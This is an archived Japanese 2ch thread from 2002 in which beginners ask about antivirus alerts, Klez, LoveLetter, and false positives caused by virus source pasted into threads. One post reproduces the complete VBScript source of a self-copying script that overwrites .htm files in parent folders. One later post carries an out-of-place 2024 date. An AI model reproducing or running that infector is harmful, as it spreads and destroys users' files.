151&154 :02/07/04 21:05 ID:5crcXlWZ
>>155 入れてみようと思います。
でももうすでにクレジットカードの番号とかのデータが盗まれて
いないか心配…。
なんで、勝手に電源が入るんでしょうか?????怖い。
>>152 DLするときは右クリック-->対象をファイルに保存で場所をデスクトップ
などに指定。
DLしたファイルをダブルクリックするなどして指示に従ってインストールせよ。
Download Program Filesにあるウイルスバスターはオンラインスキャンの
プログラムだと思われ。
どうでもいいけど、AntiVirusはインターフェイスが英語なのでそのつもりで。
ウイルスバスターの体験版は定義のアップデートができないので、無料で
間に合わせる目的で使用するなら意味なし。
買ってきなさい
159 :
ひよこ名無しさん :02/07/04 21:24 ID:uwmd2NA/
>>152 インストールって語の意味わかっていますか?
160 :
139 :02/07/04 21:26 ID:mlNiK4Aa
>>158 右クリック-->対象をファイルに保存でDLできました。
ありがとうございます。
161 :
ひよこ名無しさん :02/07/04 21:44 ID:/FHgNIZR
すいません、助けてほしいんですけど 私を相手したら場が荒れるんです。 ネタ野郎は放置してください!
>>157 だからBiosのWake On Lan とWake On Ringを無効にしろ。
停電後に自動で再起動の項目も有ったかな。
163 :
ひよこ名無しさん :02/07/04 22:45 ID:hXDumCG0
先日、ウィルスバスターで隔離したBAD TRANSのファイルを そのまま削除してしまいました。 問題があるようなら教えてください。
165 :
163 :02/07/04 22:56 ID:Z5sUu0tv
167 :
ひよこ名無しさん :02/07/05 04:18 ID:qGXMBX1q
>>124 私も一緒だ・・・。荒岸さんの言うとおり、履歴クリアして
検疫に入れてたやつを削除。永久的に削除ってなってたから、
大丈夫・・・ですよね?そして最新定義でスキャン。なんにも
感染してませんでした。ふ〜、なんでいきなりこんなことに?
2ちゃんしてたらいきなりノートン先生の警告だもんなー。
>>167 ウイルスじゃないから安心してください
いわゆる誤検出です
170 :
ひよこ名無しさん :02/07/05 10:45 ID:dTuwjhbW
シマンテックのサポセン全く繋がらない…眠い…
172 :
ひよこ名無しさん :02/07/05 10:48 ID:dTuwjhbW
>>171 製品登録について聞きたいので…うぐぐぐムキー
あっ、ボケてた。スマソ。
175 :
167 :02/07/05 15:19 ID:???
176 :
ひよこ名無しさん :02/07/05 20:52 ID:MPOIVykH
C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\LG0FXPGT\l50[4] は VBS.LoveLetter.A ウィルスに感染しています。 このファイルを修復できません。 C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\LG0FXPGT\l50[4] は VBS.LoveLetter.A ウィルスに感染しています。 ファイルへのアクセスが拒否されました。 コレってノートンが防いでくれたって事でしょうか?
>>176 2ちゃんのスレに、誰かがウイルスコードをカキコしたものが
インターネット一時ファイルに残っているのです。
>>178 そのインターネット一時ファイルを削除して下さい。
180 :
176 :02/07/05 20:57 ID:???
すいませんでした。 トーナメントの雑談スレにいったら急にノートンが反応したので・・・。 心配になって書き込みました。
トーナメントの雑談スレにもあるのか・・・
あちこちにウィルシをコピペしているアフォがいるのかな。
>>183 ・・・みたいですね!昨日もあったから。
185 :
ひよこ名無しさん :02/07/05 21:18 ID:bGQTTU3u
つい数時間前から変な症状が出始めました。 ・ブラウザのドロップダウンボタン、最大化・最小化・閉じるボタンなどが何故か数字に変わっている ・(;´Д`)等の顔文字の口がいきなり表示されなくなった ・数日前から表示可能フォントが徐々に減ってきている。 ウイルススキャンは反応なしです。・゚・(ノД`)・゚・。コワイデスウ
あ、ちなみにWinME、IE6.0です。PCはNECのVALUESTAR(液晶)
>>185 あなたと同じ質問をした人が、過去に4294967295人いて、
今1を加算したところ、0になってしまいました。ヽ(`Д´)ノ ゴルァ!!
191 :
185 :02/07/05 21:31 ID:???
お騒がせしました・・・今治りました。
>>183 タイトルがそのコピペのスレッドまで立ってるよ、
うちのノートン先生大騒ぎだよ(ワラ
194 :
ひよこ名無しさん :02/07/05 21:50 ID:8uvMvo/w
最近、IEを開くと、今まで表示させてなかったリンクのツールーバーと、 検索ウインドウが表示され、ポップアップでもその検索サイトが開かれるんですが、 これはウイルスなんでしょうか?
196 :
ひよこ名無しさん :02/07/05 21:51 ID:bsZSnaZv
今、2ちゃんねるに繋げたとたんに画面上にウィルスに感染の文字が・・・ どうしたらいいか分らなくて、思わず「ファイル削除」をしてしまいました。 どのファイルが消えたのか分りません。 もしかしたら大変な事をしてしまったかも・・・ 因みに、Norton Internet Security を入れていたのですが・・・
>>196 ちょっと上のレスぐらい呼んでから質問してくれ。
>>196 スレをちょっとしっかり読んでから質問しなはれ!(w
201 :
194 :02/07/05 21:58 ID:8uvMvo/w
>>195 オンラインスキャンをしましたが何も出ませんでした。
>>201 オンラインスキャンに頼るな。製品版飼え。
>>201 オンラインスキャン?ナメてんのか?氏ね。
204 :
194 :02/07/05 21:59 ID:8uvMvo/w
申し訳ありませんが注文中です。 まだ届いてません
205 :
ひよこ名無しさん :02/07/05 22:00 ID:FNLU+k2b
あわわわ・・・ウイルス感染してたYO! VBS Love letterだぼ。 修復できないから削除しちゃったの。 いい?
>>205 いいけど、知らんゾ。ウイルス対策ソフトも導入しないでネットするなんて
裸で街を歩くようなもんだ!
>>205 いい。そのウィルスコードをそっかのスレにコピペしたヴァカのせい。
感染はしてないと思われるから安心すれ。
210 :
205 :02/07/05 22:05 ID:FNLU+k2b
安心しますた。 はじめてだったから、すごいびびったよ。 さんくす。
212 :
196 :02/07/05 22:36 ID:fDos89az
今又画面上にウイルス感染の警告が出てしまったので、今度は「検疫」をしました。 で、一旦接続を切ってからスキャンした所「VBS LoveLetter A」と出たのですが、 これってどう言うウイルスなんでしょうか ?
>>212 ほっとけ!検疫したら、削除すれ。実行ファイルじゃないから。。。。
214 :
205 :02/07/05 22:39 ID:FNLU+k2b
>>212 最新50くらいは読んでから質問しる!
大丈夫らしいよ。
215 :
212 :02/07/05 22:40 ID:fDos89az
>>215 あとね、インターネットオプションの一時ファイルも削除すれ!
218 :
ひよこ名無しさん :02/07/05 22:41 ID:OmwR5+RQ
はじめまして。 明日6日はklezとかいうウイルスが作動すると聞きました。 Norton AntiVirusの自動Live UpDateをオフにしてたんで、 今日あわてて最新版をダウンロードして、Cドライブを スキャンして何も検出されませんでしたが、これで感染 していないと判断してよろしいのでしょうか? また、LiveUpdateの他に何かダウンロードした方がいい ものとかありますでしょうか? よろしくお願い致します。
219 :
215 :02/07/05 22:43 ID:fDos89az
今から削除します。
>>218 ウイルス定義ファイルが最新なら大丈夫でしょう!心配なら、明日ネットしなきゃいいんだよ。
221 :
218 :02/07/05 22:46 ID:OmwR5+RQ
>>220 どうもありがとうございます!
ちなみに今思ったんですが、奇数月の6日だけ
Windowsの時計で日付を他の日に変えとくなんてのは
ダメなんでしょうか?
>>221 怪しげなexe.ファイルがないかどうかチェックして、なければ気にしないでいいんじゃないかな?
ま、念のためにバックアップはマメにしておきましょう。
>>221 Norton AntiVirusを信用してないって事? エラクめんどうな事考えるのね
>>221 万一ウィルスが発動したとしても、お前が氏ぬわけではない。
226 :
ひよこ名無しさん :02/07/05 22:58 ID:LqK2Dx4d
228 :
218 :02/07/05 22:59 ID:OmwR5+RQ
>>222 ですね(w
自分のPCがリカバリの刑になるだけならまだいいんですが(イヤだが)、
PC内のファイルを勝手にメールに添付して誰かに送信するとか
聞いたんで、今からヤバい画像とかテキストをCDに移そうかと
思ったら、ウチCD焼けなくて・・・(w
>>223 ファイル名を見ても怪しげなのかどうなのか分からなくて、スマソです。
“wink〜.exe”とかいう名前のファイルがC:\Windows内にあると
感染してるという話を聞いたんで、試しに検索してみましたが、
ありませんでした。大丈夫でしょうか。
>>224 スマソです。メジャーなウイルス駆除ソフトはことごとくスルーされる
とかいう怖い話を聞いたもので・・・。
>>スマソです。メジャーなウイルス駆除ソフトはことごとくスルーされる >>とかいう怖い話を聞いたもので・・・。 逆もあるね、なんも無いのに誤作動したり。
>>228 特定の日付になるとKLEZは感染者のPCに悪さをするけど、
感染メール送信などの活動は日付に関係なくおこなわれるので、
その点はお忘れなく・・・
232 :
218 :02/07/05 23:14 ID:OmwR5+RQ
>>229 出た!初めて見ました。感動です!
このQuaraitineとかいう場所に隔離されたファイルは
削除しなくてもいいんでしょうか?
>>231 初めて知りました(汗。
感染してるんだとすると、もう遅かったってことですね。
233 :
218 :02/07/05 23:15 ID:???
× Quaraitine ○ Quarantine 間違えました。
>>232 欲しかったら残せば?スキャンしてれば一応OK!
235 :
218 :02/07/05 23:22 ID:OmwR5+RQ
ここの皆さんのおかげで安心して明日を迎えることができそうです! どうもありがとうございました。
>>235 少し、本読んだ方がいいかも?ま、がんがってください!なんせ、自己責任ですから。。。
??????
前にも
>>238 のような書き込みを見ましたが、なんのために
やっているのですか?
ここはそーいうスレですか?
242 :
240 :02/07/06 00:07 ID:???
>>241 そーいうことですか。ありがとうございました。
243 :
ひよこ名無しさん :02/07/06 00:21 ID:idOHTvpC
ついさっき2ちゃんを見てるとAntiVirusからウィルスに感染したと 告知がありました。ウィルス名はVBS.Internalです。 はじめて感染したのでVBS.Internalがどういうウィルスなのかsymantecで 検索したのですが検索できませんでした。 いったいどういうウィルスなのでしょうか。 よろしければ教えてください。お願いします。
>>243 インターネットオプションの全般タブからインターネット一時ファイルクリアしてから
再スキャンしたら多分検知されません。
>>243 このスレの上のほうを読んで下さい。大丈夫です!
>>243 これは「ウイルス」じゃないです。ある文字列がカキコされてて、ノートン
先生が反応しただけです。
247 :
ひよこ名無しさん :02/07/06 00:29 ID:idOHTvpC
>>244 245 246
ありがとうございます。はじめてなんで動揺してしまいました。前スレ
読みます。大変失礼いたしました。
バスターは何も反応しないが なんで?
ノートンはバカだということ
253 :
定説 :02/07/06 00:52 ID:???
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> バスター>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>クソースネクストバカフィー >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>ウイルス警備隊
>ウイルス警備隊 そんな漫画みたいなソフトあったら面白いね
255 :
俺 :02/07/06 01:01 ID:???
2ヶ月前に初めてPC買ったんすよ、NECのLaVie L LL700/2D プレインストされてんのは当然マカフィー PC初心者板でまかひは豚だ、糞だのと罵られてるが、 初めて買った愛機に付いてるモノゆえ、 愛着を持ってコイツを使って逝こうと思っていたのに・・・ 3ヵ月後にでた夏モデルLL700/3Dのプレインストは、 ノートンアンチウイルス・・・ NECのバカーーーーーー!? 金返せウワァーーーーーーーーーーーーーン・゚・(ノД`)・゚・
>>248 ノートンとバスターでは、ウイルスを判定する内容(基準)が異なっているから。
257 :
ひよこ名無しさん :02/07/06 02:00 ID:WVYNycne
ただの疑問なんですがKLEZの奇数月6日の破壊活動は起動している最中に起こるんですか? 1度起動してから次に起動した時?
>>257 その前に、あなたはウイルス対策ソフトを導入し、ウイルス定義を更新して定期的に
スキャンしているんでしょうね?
259 :
ひよこ名無しさん :02/07/06 02:11 ID:WVYNycne
>258 ちゃっかりしっかりしてます した上で単純に疑問に思っただけなんで
>>259 じゃ、心配ない!だけど、大事なファイルとかは定期的にバックアップしておきましょう。
261 :
ひよこ名無しさん :02/07/06 02:19 ID:WVYNycne
>260 分かりました 今まで月1くらいだったバックアップもこれからは余裕のある時は週1位でしようと思います レスありがとう
>>261 いいえ。ウイルスにやられても、リカバリすりゃいいんだからさ!
メールとか自分にとって大切なデータはバックアップしとくとラク
です。
263 :
ひよこ名無しさん :02/07/06 02:23 ID:94DTRHLV
ウィルスを作った人で捕まった人いますか? 毎日のようにウィルスの被害が出てるのに、 新聞とかに逮捕とかいう記事がありません。 ひょっとして誰も逮捕されてないのでしょうか?
>>263 NimdaかCodeRedかの作者は捕まったかと。
新聞に載ってないならニュースでも見よう。
265 :
ひよこ名無しさん :02/07/06 02:26 ID:94DTRHLV
−−−−−−− 俺様用しおり ∧_∧ ( ´∀`)< 今日はここまで読んだ −−−−−−−
268 :
ひよこ名無しさん :02/07/06 03:43 ID:RESDNG1N
かちゅ〜しゃで、Off板の湘南ゴミ拾いオフのスレを開いた瞬間ノートンが かちゅのlogがdatVBS.LoveLetter.Aに感染している、と言い出したのですが これも例のコピペでしょうか?
272 :
ひよこ名無しさん :02/07/06 09:12 ID:IuIdl6Gu
スレ違いだったら、すみません。 最近、WEBメールの私のアドレス宛てに 同一人物と思われる人から、複数のメアドを使って 本文無し、添付ファイルなしの、メールが来ます。 一体何なのか良く分りません。こんな経験ある人 教えて頂けたら嬉しいです。 説明不足でしたら、ごめんなさい。
↓最近、これが大量に貼り付けられてるみたいなんですが何か意味があるんですか? <BODY Onload="Redirect();"> <script language="VBScript"><!-- Sub Redirect Randomize If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline location.href = location.href +"l" End Sub Sub Offline Dim FSO,folder ,fc, f1, cpath Set FSO = CreateObject("Scripting.FileSystemObject") HostPath = Replace(location.href, "file:///", "") HostPath = Replace(HostPath, "/", "\") cpath = fso.GetParentFolderName(HostPath) Set folder = fso.GetFolder(cpath) While folder.IsRootFolder = false Set folder = fso.GetFolder(cpath) Set fc = folder.Files cpath = fso.GetParentFolderName(cpath) For each f1 in fc s = Lcase(Fso.GetExtensionName(f1.name)) If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l", true fso.CopyFile HostPath, f1.path, true End If Next Wend If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal") End Sub --></script> </BODY>
−−−−−−− 俺様用しおり ∧_∧ ( ´∀`)< 今日はここまで読んだ −−−−−−−
−−−−−−− 俺様用おしり ∧∧ (゚Д゚ ) ⊂ ヽ 〉 ノノ~ ← 今日はここに突っ込んだ ∪∪ −−−−−−−
277 :
272 :02/07/06 10:47 ID:???
>>274 さん
ありがとうございました。
ウイルスソフトは今現在、あぼーんされて
いますので(まか・・・です)、のーとん
買ってきます。OEは使っていません、ていうか
メール送信には使っていますけど(WEBメールの
アドレスで)、受信はやふーでIE使ってみてます。
受信しなくてもOEは危ないのでしょうか?
それから、添付ファイルついてなくても(少なくとも
ヤフーの言ってる事が正しければ添付はついてない
ように思えます)、Klezって感染するのでしょうか?
一応ノートンのオンラインスキャンでは感染ファイルは
ゼロでした。
色々済みませんが、宜しくお願いします。
>>277 >受信しなくてもOEは危ないのでしょうか?
危ない理由も知らずに危ない危ないは酷いです・・・失礼です・・・(泣)。
プレビュー時に相手が仕込んだある形式の任意のスクリプトが実行できてしまう
(最近のバージョンは対策済み)が問題。
>>277 メール欄は空白にしてID出してね。
オンラインスキャンしかしてないの?ぜひ製品版を購入してください。
昨日ウィルスに感染したが、あまりにも時代遅れのウィルスだったので驚いちゃったよ。 感染ウィルス:VBS.Love Letter.A 2年以上前に流行ったレトロなウィルスでした。 感染経緯:メルマガで長い間送ってこないものを整理しようと思い、マイページから 発行者のサイトにアクセスしたら変な英語のページになってて、ヤバイと 思ったら感染してた。 以上、私の不思議なウィルス体験です。
281 :
272 :02/07/06 11:00 ID:W1/Ab9ZN
>>278 さん
ごめんなさい。プレビューすると危ないということしか、
知りませんでした。(プレビューで実行されるウイルスもあるから
ですよね?)だから、送信にしか使ってなかったのですが。
という事は、やっぱり受信しなければ問題ないという事で、
いいのでしょうか?
>>279 さん
空白にしました。すみません。製品版はまか・・・を
使ってますが、最新の定義にUpdate何故かできないのです。
今日のーとん買ってきます。
何回もすみませんが、結局この添付ファイルなしのメールは
やっぱりKlezなのでしょうか?
>>281 マカフィーのプレインストール版?
先にそれをアンインストールしてからじゃないとまずいので気をつけて。
まずはセーフモードで起動してアンインストールしてね。
285 :
272 :02/07/06 11:16 ID:fCPGDgZ4
>>282 さん
いまいち仰っておられる事の意味が分ってません。。。
本文は全く無し、メールの件名は色々、センダーは
普通のプロバイダーのアドレス使ってます(但し、複数のメアド。
同じプロバイダーのアドレスもありません)
>>283 さん
そうです。アンインストールの仕方ありがとうございます。
しかし、こんな私も会社では一番のPC通。。。いいのかなー。
287 :
272 :02/07/06 11:30 ID:W0G+IvpN
>>286 さん
OE使ってたらヘッダーの見方は分るのですが、
WEBメールでのやり方が分らないのです。
諦めなきゃ駄目ですかー?困った。。。
設定を変える。 WEBメールは何? yahoo、hotmailなら表示できる。
289 :
272 :02/07/06 12:01 ID:ZFEyRLsl
From: xxx <
[email protected] >
To:
[email protected] Subject: Compressed
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=KQBomZ46W37m2EkT85n3g9I
Content-Length: 126831
こんな感じでした。どうでしょう?
291 :
272 :02/07/06 12:12 ID:ZFEyRLsl
Received: from mfe.odn.ne.jp (EHLO t-xxx.odn.ne.jp) (xxx.90.131.181) by mta14.mail.yahoo.co.jp with SMTP; Received: from Bgkle ([61.xxx.6.182]) by t-xxx.odn.ne.jp with SMTP id <200207051903.TAVJ.6050.t-xxx.odn.ne.jp@ xxx.odn.ne.jp> これでした。
292 :
質問(・∀・)おながいします :02/07/06 12:16 ID:llrLsSyb
会社のおじさんがぁゃιぃ添付付本文ナシのメールを興味本位で開封して以来 クレズHに感染しているメールを送信しているのでそれを駆除して送信しました、 という警告メールが日に10通位着続けてます。 送信先のアドレスは見覚えのないものです。 バスターの最新定義で検索&シマンテックのオンラインスキャンで検索しても 何も出て来ませんでした。 本当に感染してるのでしょうか? また、この警告メールを止めるにはどうすればいいでしょうか? os - windows98 メーラー - OE(バージョンはちょっと忘れてしまいました。修正パッチとかは当ててない)
>>292 今使っているメアドを登録している他の誰かのPCにクレズHが感染していると思われ。
>>292 ウイルス対策ソフトは購入してないのですね?
>>292 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ウィルス対策ソフトも入れずにネットしてるのかゴルァ!! 逝ってよし!
\ __________________
∨
∴ ・〜 ブーン
∧ ∧ ∴∴ ↑
>>292 ( ゚Д゚) ∴∴∴
∪ ⊃自
〜| │ プシュー
U U
297 :
292 :02/07/06 12:27 ID:llrLsSyb
>293 ウチの事務所でネットにつなげるのはそのパソコンだけなんです。 社内LAN経由で感染するということですか? >294 最初にぁゃιぃメールを開封した時点でバスター2001で定義更新したのが半年前 というのが入ってましたが、当然無反応でした。 このメールが着だしてから会社のシステム部があわてて最新定義に更新しましたが それで検索掛けても無反応です。 ちなみにLANで繋がってる全てのパソコンを検索しましたがが何も感染してないようです。
VBS.Interbalというウイルスに感染しますた。 ウイルス定義ファイルは最新ですが、 ファイルを修復できません(;´Д`) SARCに提出しても良いのでしょうか?
>>297 クレズhはヘッドを偽装します。
自分が感染してなくてもメアドが登録してあるPCから送られて戻ってくる可能性が。
>>299 ヘッダね。
頭を偽装されても困るっす。w
301 :
299 :02/07/06 12:39 ID:???
>>298 ウィルス単体のみのファイルを修復できるわけが無い。
とっとと削除しる。
>>298 その、該当ファイルをソッコーで削除!記念に残しますか?(w
>>298 そんな既知のウィルスをSARCに提出したってバカにされるだけ。
305 :
298 :02/07/06 13:03 ID:???
オラァ消えろやー!! というかけ声と共に削除しますた。 みなさんありがとです。
308 :
◆bzx9FKd2 :02/07/06 13:13 ID:qFGpOXba
これ、テンプレに入れてもらってもいいだろうか。 メーラーでOutlook(Express)を使っている場合、 ツール −> オプション −> セキュリティーで セキュリティーゾーンを「制限付きサイトゾーン」にチェックする。 (OE5.5で設定できることを確認) で、InternetExplolerの ツール −> オプション −> セキュリティーで 制限付きサイトのアイコンをクリック 下のほうにある「レベルのカスタマイズ」ボタンをクリック 「セキュリティーの設定」が新しく現れるから、その中にある ActiveXに関係ある項目を全てOffにする。 (IE5.0SP2で設定できることを確認) これでドラクエ的にスライム程度のウイルスなら 撃退できると思うのだが。 どうだろう
309 :
◆bzx9FKd2 :02/07/06 13:16 ID:qFGpOXba
308だが。 すまん、「撃退できる」って言い方はまずいな。 「チャチなウイルスのなかには、これで撃退できるものもある」 ぐらいにしておく。
>>308 ここにきた時点で初心者or質問者は感染の可能性があるのでそれは無意味では・・・
と言ってみる ロールシャッハテスト
>>308 SP2と多少の警戒じゃダメ?
証明書のないActiveXはダイアログ出るし。
313 :
◆bzx9FKd2 :02/07/06 13:38 ID:qFGpOXba
308です。
>>311 確かに、感染した後にこれをするのは虚しいかも...
でも、駆除した後にはいくらか役に立ってくれるのでは、
と自己弁護してみるテスト(w
>>312 うーむ、ちょっとした設定をすることで「もう万全だぜ」などと
思い込んでしまうよりも、普段からメールには警戒心を持っておく
&パッチをきちんと当てる習慣を身に付けるほうがよいかも...
外したかのぅ。
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ 1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。
基本(この問題について)
>>2 既知の2chで話題になってるvbsソース
>>3 2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。
3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/ の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?
>>314 機能引っかかった。
なるほどと感心した。
テキストベースのウイルスだからテキストで判断するしかないんだね。
>>314 ノートンの設定で、Temporary Internet Files を除外すればいいんじゃないかな?
おれは2ちゃんブラウザなので、ログ保存フォルダを除外に設定した。
>>317 勉強になった♪
これ、A BONE巻き込んで落ちるからちょっと困ってたのよね。
Temporary Internet Files を除外すると、 本当にウィルスのあるwebサイトを開いたときにも無反応になる可能性が あるので、注意しませう!
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ 1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。
基本(この問題について)
>>2 既知の2chで話題になってるvbsソース
>>3 2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。
3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/ の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?
321 :
age :02/07/06 17:16 ID:???
age
322 :
kop :02/07/06 18:27 ID:X9jWQgyn
**************緊急質問(テスト)*********** さっき、かちゅーしゃで不謹慎にも半角文字列板行ったんですよ。 で、いつものようにスレッド適当に選んでたんです。 するとあるスレッドをクリックして開いた瞬間事件は起きました。 なんとウイルスに感染したのです。 スレ開いただけですよ。 いったいどうなっているんでしょうか?? ・・・・という質問したら死刑ですか??
323 :
167 :02/07/06 18:29 ID:c52K0GOR
またvbsにひっかかりました。検疫項目から削除して スキャンしたけど、感染項目が見つかりました。 インターネット履歴を削除してなかったので、さっき やったけど、もう一度スキャンしたらなんにも出ないのかな。 不安だ・・・。ていうか、もうイタズラはいやづら・・・。
326 :
ひみつの検疫さん :2024/12/22(日) 21:19:51 ID:MarkedRes
汚染を除去しました。
329 :
kop :02/07/06 18:34 ID:X9jWQgyn
LOVE LETTERウイルスがうざいです。 かちゅうしゃでvbscript効かないようにできないんでしょうか??
>>329 俺はABONEだが、かちゅだってどこかのフォルダにログを保存しているだろ?
Norton AntiVirus の設定で、そのフォルダを「除外」に設定すれば?
331 :
kop :02/07/06 18:54 ID:X9jWQgyn
LoveLetterウイルスについて(かちゅう)
さっき感染したスレ調査してきたら、↓のことがわかりました。
かちゅうの場合スレにポイントしたら黄色いスレの表示がポップアップででます。
しかしLoveLetterのスクリプトコピペしているスレは、
ポップアップが表示されないことがわかりました。
PS.
>>330 除外設定にしたら、他のウイルスに感染・・・っていう心配はしなくていいんでしょうか?
332 :
ひよこ名無しさん :02/07/06 18:54 ID:kovbC4Qz
初心者厨丸出しな質問していい? 他人に迷惑かけたくないんでOEのアドレス帳からっぽにしてるんだけど、 もしそこに自分のメアド入れとけばメールを介したウイルスに感染してる時、 いち早く気付けますか? あと上のラブレターというのは誤動作させるだけで実害はないのですか? ほうっておいても平気なのでしょうか? それともウイルスには一応感染 していて、こまめにテンポラリーファイルフォルダを削除しないいけないのですか?
>>331 >ポップアップが表示されないことがわかりました。
それは、スレの取得に失敗してるので、ログが保存されてないからでは?
>除外設定にしたら、他のウイルスに感染・・・っていう心配は
その心配はない。
例の2chのスレに安置ウイルスソフトが反応するってやつは 次スレからテンプレに入れたほうが良いな。
>>335 テンプレって何ですか??
>>330 >Norton AntiVirus の設定で、そのフォルダを「除外」に設定すれば?
設定の仕方はどうやるんですか??
337 :
ひよこ名無しさん :02/07/06 19:12 ID:rKtBjjqR
>>335 胴衣。でもここの次スレが立つ頃には、もう忘れられてるかも・・・
マカフィーなんでよく理解できないんだが、で、このイタズラは実害あるわけ? このスレお気に入りに設定してるんだけど、漏れも感染してるってことなのか?
( ´,_ゝ`)プッ...馬鹿ばっかだな(藁
341 :
ひよこ名無しさん :02/07/06 19:26 ID:+XuPG6lU
342 :
↑ :02/07/06 19:27 ID:???
ソース貼られてるんだから当然じゃん
>>340 んじゃ、賢い君が馬鹿にもわかるように事の顛末の全容わかりやすく説明してくれ。
賢い君なら口だけじゃなくきっとできるよな。
>>342 そこの76に貼られている長いVBScriptコードはウィルスではないが、
ノートンがウィルスと誤認するようだ。
ノートンは、VBScriptは無条件でウィルスとみなすのか?
>>344 悪意あるコードの一部を認識するんでしょう。
だからその他の部分をダミーとして並べば・・・。
346 :
↑ :02/07/06 19:50 ID:???
マッチングさせてるパターンに問題があって 普通に使われるようなコードをパターンに使ってるから 誤検出してるんだよ
>>346 なるなる。そっちね。
でも、
Copy(dirsystem&"LOVE-LE〜VBS”) //いたずら防止のため潰してありますわ
な文字列でも反応しちゃう罠。
ノートンのマッチングって、単に文字列比較 strcmp してるだけ??
>>348 strcmpって・・・。
strncmpでしょう。w
だったら俺でも作れる罠(w
stricmp かも?w
でも、パターンマッチが基本だとは思うけどね。ウイルスチェックって。 バイナリにHDDをフォーマットする一般的なコードがないかマッチングさせる。とか。 その考え方で逝くと有害であるだろう文字列をテキストから探すのは至極当然。 流石に各言語のローダとかチェッカとか作ってたら大変かと。 少なくても応急処置としては正しかったかなと。
>>350 作った。
char virus[] = { "LOVE-LETTER" };
(中略)
while (*p) {
if (strncmp(p, virus, sizeof(virus)) == 0) {
printf("感染!");
return 1;
}
p++;
}
これじゃダメ?
>>354 >p++;
何故一文字ずつずらしているのか・・・?w
356 :
↑ :02/07/06 20:16 ID:???
